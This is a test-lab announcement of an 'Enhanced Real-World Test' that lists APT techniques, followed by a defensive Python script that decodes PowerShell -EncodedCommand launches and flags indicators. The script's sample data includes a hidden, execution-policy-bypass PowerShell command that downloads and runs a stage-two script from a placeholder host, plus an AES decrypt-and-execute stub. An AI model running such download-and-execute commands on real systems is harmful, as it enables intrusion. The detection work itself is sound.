New Test Introduction: Enhanced Real-World Test
New types of threats require new kinds of testing. We are therefore introducing an additional test in which we use new, tailor-made attacks to compromise a victim system. This “Enhanced Real-World Test” will be part of our Public Main Test Series of 2019, in both the Consumer and the Enterprise Test Series.
Advanced Persistent Threat (APT) is a term commonly used to describe cyber-threats that employ complex, targeted and effective attacks to steal confidential information. Such attacks are highly purposeful and usually rely on specialised tooling: heavily obfuscated malicious code, the malicious use of benign system tools already present on the victim (often called “living off the land”), and fileless malicious code that runs in memory without being written to disk as an executable.
In our new, additional “Enhanced Real-World Test”, we will use the latest hacking and penetration-testing techniques that attackers employ to gain access to computer systems from the outside. Each attack can be mapped onto the seven phases of Lockheed Martin’s Cyber Kill Chain, with each phase leaving its own Indicators of Compromise (IOCs) on the victim system. The tests will use a subset of the Tactics, Techniques and Procedures (TTPs) catalogued in the MITRE ATT&CK framework.
The following techniques are expected to be employed in the planned malicious attacks:
- Use of system programs already present on the victim (living off the land), so as not to trigger signature-based detection
- Use of popular scripting languages (VBA, VBS, batch files, PowerShell) as well as compiled binaries
- Staged malware (a small first stage that fetches the real payload from the attacker) as well as unstaged malware delivered in one piece
- Obfuscation and/or encryption of the malicious code prior to execution (for example Base64 encoding and AES encryption)
- Different C2 channels for connecting back to the attacker (HTTP, HTTPS, raw TCP)
- Use of known exploitation and post-exploitation frameworks (Metasploit Framework, Meterpreter, PowerShell Empire, Pupy, etc.)
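Several of the techniques listed above (PowerShell as the scripting language, Base64 obfuscation of the code before execution, a staged download from the attacker) leave a characteristic IOC on the victim: a `powershell.exe` process launched with an `-EncodedCommand` blob. The script below is an added illustration, not part of AV-Comparatives’ test methodology or tooling. It decodes such blobs from process-creation command lines and flags the indicators a responder would look for (hidden window, execution-policy bypass, download cradle, nested Base64, use of the .NET crypto API). The command lines it runs over are constructed samples, and the 192.0.2.10 address is a documentation-range placeholder, not a real C2 server.

```python
"""Decode and triage PowerShell -EncodedCommand launches found in process-creation logs."""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...), so match all of them.
_ENC_PREFIXES = "|".join("encodedcommand"[:n] for n in range(14, 0, -1))  # longest alternative first
ENCODED_FLAG = re.compile(rf"(?i)(?:^|\s)-(?:{_ENC_PREFIXES})\s+([A-Za-z0-9+/=]+)")

# Indicators checked on the outer command line ...
OUTER_INDICATORS = {
    "hidden_window": re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"),
    "policy_bypass": re.compile(r"(?i)-e(?:x\w*|p)\s+bypass"),   # -ExecutionPolicy / -Exec / -ep Bypass
    "no_profile": re.compile(r"(?i)-nop(?:rofile)?\b"),
}
# ... and on the decoded script itself.
SCRIPT_INDICATORS = {
    "download_cradle": re.compile(r"(?i)Net\.WebClient|DownloadString|DownloadFile|Invoke-WebRequest|\biwr\b"),
    "invoke_expression": re.compile(r"(?i)Invoke-Expression|\bIEX\b"),
    "nested_base64": re.compile(r"(?i)FromBase64String"),
    "crypto_api": re.compile(r"(?i)System\.Security\.Cryptography|AesManaged|AesCryptoServiceProvider"),
}


def encode_ps(script: str) -> str:
    """Build the Base64 form PowerShell expects for -EncodedCommand: UTF-16LE text, no BOM."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_ps(blob: str):
    """Reverse encode_ps; return None when the blob is not valid Base64 or not valid UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def analyze_command_line(cmdline: str) -> dict:
    """Return a triage record for one process command line."""
    record = {"command_line": cmdline, "encoded": False, "decoded": None, "indicators": []}
    if not re.search(r"(?i)\b(?:powershell|pwsh)(?:\.exe)?\b", cmdline):
        return record                      # only PowerShell launches are in scope here
    for name, pattern in OUTER_INDICATORS.items():
        if pattern.search(cmdline):
            record["indicators"].append(name)
    match = ENCODED_FLAG.search(cmdline)
    if match:
        record["encoded"] = True
        record["decoded"] = decode_ps(match.group(1))
        if record["decoded"] is None:
            record["indicators"].append("undecodable_blob")   # malformed blob is itself worth a look
        else:
            for name, pattern in SCRIPT_INDICATORS.items():
                if pattern.search(record["decoded"]):
                    record["indicators"].append(name)
    return record


def scan(lines):
    """Return only the records carrying at least one indicator, for analyst review."""
    return [r for r in (analyze_command_line(line) for line in lines) if r["indicators"]]


# Constructed sample command lines standing in for process-creation telemetry (not real captures).
STAGE2_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://192.0.2.10/stage2.ps1')"
INLINE_DECRYPT = ("$k=[Convert]::FromBase64String('AAAA');"
                  "$a=New-Object System.Security.Cryptography.AesManaged;"
                  "IEX ([Text.Encoding]::UTF8.GetString($p))")
SAMPLE_COMMAND_LINES = [
    "powershell.exe -NoP -W Hidden -Exec Bypass -EncodedCommand " + encode_ps(STAGE2_CRADLE),
    "powershell.exe -nop -w hidden -enc " + encode_ps(INLINE_DECRYPT),
    "powershell.exe -ExecutionPolicy Bypass -File C:\\Scripts\\backup.ps1",
    "powershell.exe -e notbase64!!!",
    "C:\\Windows\\System32\\cmd.exe /c dir",
]

if __name__ == "__main__":
    for rec in scan(SAMPLE_COMMAND_LINES):
        print(rec["indicators"], "|", rec["decoded"] or rec["command_line"])
```

The third sample (a legitimately signed-off administrative script run with `-ExecutionPolicy Bypass`) is returned as well, which is deliberate: the decoder surfaces everything with an indicator and leaves the benign/malicious decision to the analyst, who would normally add parent-process and user context before tuning the rule.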
The tests will take place over the course of the year, and the results will be published in Q4 2019.